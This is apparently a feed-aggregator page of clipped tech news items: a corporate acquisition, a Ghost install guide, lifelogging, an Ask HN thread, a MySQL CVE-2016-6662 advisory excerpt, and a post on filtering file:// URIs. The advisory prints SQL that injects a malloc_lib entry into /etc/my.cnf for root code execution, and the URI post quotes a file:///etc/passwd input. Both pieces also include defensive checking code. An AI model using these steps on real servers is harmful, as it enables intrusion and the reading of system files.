Canada’s OpenText to buy Dell-EMC’s enterprise content unit for $1.62 billion

(Reuters) – Canadian business software maker OpenText Corp said it agreed to buy Dell-EMC’s enterprise content division for $1.62 billion as it looks to expand its services to larger businesses.


Original URL: http://feeds.reuters.com/~r/reuters/technologyNews/~3/9TEqtgQ0tbA/us-dellemc-divestiture-open-text-idUSKCN11I1DP

Original article

How to Install Ghost Blog Software with Apache and SSL on Ubuntu 16.04

Ghost is a powerful Open Source publishing and blog platform that is beautifully designed and easy to use. Ghost is written in JavaScript and uses Node.js as its runtime environment. This tutorial shows the installation of the Ghost Blog software with Apache and SSL on Ubuntu 16.04.


Original URL: https://www.howtoforge.com/tutorial/how-to-install-ghost-blog-on-ubuntu/

Original article

Lifelogging is dead for now

The name Gordon Bell has become synonymous with lifelogging. Bell is the legendary engineer and researcher emeritus who recently retired from Microsoft. Bell started wearing a camera around his neck in 2000. But not just any camera. He wore an automated one that took pictures every 30 seconds. He was the main subject in a long-term experiment called the MyLifeBits project while a principal researcher at Microsoft.
The idea was to record, capture and store every last bit of data that would later help him have a machine-enhanced photographic memory. In addition to the camera, Bell captured all his articles, lectures, presentations, memos, academic papers, home movies, IM transcripts, phone calls and more. The idea was based on the work of Vannevar Bush, who in 1945 envisioned a machine called the Memex (a portmanteau of “memory” and “index”), a kind of desk that would scan, link and instantly


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/UjOgLy4Qv4M/lifelogging-is-dead-for-now.html

Original article

Ask HN: Is web programming just a series of hacks on hacks?

374 points by barefootcoder 6 hours ago | 265 comments

Been doing application development, primarily backend development, for a number of years. I’ve always found it quite easy to move up and down the stack and work anywhere from UI down to the bare metal in a number of environments and languages, and always the ‘fast learner’ who quickly knows the system inside-out, even when thrown into some area that I’ve never seen.

Lately I’ve been doing some web development on a fairly long-lived and large code-base, but I’m finding it MUCH harder to wrap my head around than application development ever was. I think my difficulty is that the whole environment feels so… HACKISH… everything is a horrible hack on top of a horrible hack. (yes, I’m familiar with the history,


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/QA3nqi4l40Y/item

Original article

MySQL Remote Root Code Execution 0day Exploit (CVE-2016-6662)

=============================================
– Discovered by: Dawid Golunski
– http://legalhackers.com
– dawid (at) legalhackers.com

– CVE-2016-6662
– Release date: 12.09.2016
– Severity: Critical
=============================================

I. VULNERABILITY
————————-

MySQL set global general_log_file = ‘/etc/my.cnf’;
mysql> set global general_log = on;
mysql> select ‘
‘>
‘> ; injected config entry
‘>
‘> [mysqld]
‘> malloc_lib=/tmp/mysql_exploit_lib.so
‘>
‘> [separator]
‘>
‘> ‘;
1 row in set (0.00 sec)
mysql> set global general_log = off;

The resulting config would then have the following part appended:

root@debian:~/# cat /etc/my.cnf

[mysqld]

key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select ‘

; injected config entry

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

[separator]


160728 17:25:15 40 Query set global general_log = off

This config contains some redundant information that would normally cause MySQL
to fail to start up during a restart due to parsing issues.

However, the important part is that the config now contains the section:

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
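A defender-side check for the condition described above, as an added example that is not part of the advisory: it scans a MySQL config file's text for a malloc_lib entry and for general-query-log lines that have no business being in a config file. The function name and the sample text (constructed from the output shown above) are assumptions of this example.

```python
import re

# Lines the general query log writes; finding them inside a config file
# means the log was pointed at that file at some point.
LOG_RESIDUE = re.compile(
    r"^(Time\s+Id\s+Command\s+Argument|Tcp port:|\S*mysqld, Version:"
    r"|\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+\d+\s+\w+)")
# MySQL accepts option names with either '-' or '_'.
MALLOC_LIB = re.compile(r"^\s*malloc[-_]lib\s*=\s*(\S+)", re.I)


def audit_mysql_config(text):
    """Return (line_no, kind, detail) findings for one config file's text.

    A malloc_lib entry can be legitimate (an alternative allocator), so a
    hit means "review this path", not proof of compromise.
    """
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = MALLOC_LIB.match(line)
        if m:
            findings.append((no, "malloc_lib", m.group(1)))
        elif LOG_RESIDUE.match(line):
            findings.append((no, "log_residue", line.strip()))
    return findings


# Constructed sample, modelled on the tampered my.cnf shown in the advisory.
SAMPLE = """[mysqld]
key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select '

; injected config entry

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

[separator]

160728 17:25:15 40 Query set global general_log = off
"""

if __name__ == "__main__":
    for finding in audit_mysql_config(SAMPLE):
        print(finding)
```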

mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/0z1_aQhvi9E/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

Original article

If your code accepts URIs as input.. Filter out file://

There are many online sites that accept reading input from remote locations. For example a site might try to extract all the text from a webpage, or show you the HTTP-headers a given server sends back in response to a request.

If you run such a site you must make sure you validate the scheme of the location you’re given, and remember to validate it again for every HTTP redirect you’re sent.
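One way to implement that check, as an added example that is not code from the original post: the scheme is allowlisted on the first URL and again on every redirect target. The `fetch_one` transport callback and the `example.test` responses are assumptions constructed for this example so it runs offline.

```python
from urllib.parse import urlsplit, urljoin

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 5


class RejectedURL(ValueError):
    """Raised when a URL or redirect target uses a scheme we do not allow."""


def check_scheme(url):
    """Return the URL if its scheme is allowlisted and it names a host."""
    url = url.strip()
    parts = urlsplit(url)  # urlsplit lower-cases the scheme for us
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        raise RejectedURL(f"refused: {url!r}")
    return url


def safe_fetch(url, fetch_one):
    """Fetch url, re-validating the scheme on every redirect hop.

    fetch_one(url) is a hypothetical transport callback that returns
    (status, location_header_or_None, body) WITHOUT following redirects.
    """
    current = check_scheme(url)
    for _ in range(MAX_REDIRECTS + 1):
        status, location, body = fetch_one(current)
        if status in (301, 302, 303, 307, 308) and location:
            # Location may be relative: resolve it, then validate again.
            current = check_scheme(urljoin(current, location))
            continue
        return current, body
    raise RejectedURL("too many redirects")


# Constructed responses standing in for remote servers (not real hosts).
FAKE_WEB = {
    "http://example.test/a": (302, "/b", ""),
    "http://example.test/b": (200, None, "hello"),
    "http://example.test/evil": (302, "file:///etc/passwd", ""),
}


def fake_fetch_one(url):
    """Look the URL up in the constructed table instead of the network."""
    return FAKE_WEB[url]
```

With a real HTTP client, the equivalent is to disable automatic redirect following and pass each `Location` value back through `check_scheme` before requesting it.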

Really the issue here is a confusion between URL & URI.

The only time I ever communicated with Aaron Swartz was unfortunately after his death, because I didn’t make the connection. I randomly stumbled upon the html2text software he put together, which had an online demo containing a form for entering a location. I tried the obvious input:

file:///etc/passwd

The software was vulnerable, read the file, and showed it to me.

The site gives errors on all inputs now, so it cannot be used to demonstrate the


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/92BFSddaKxU/If_your_code_accepts_URIs_as_input__.html

Original article
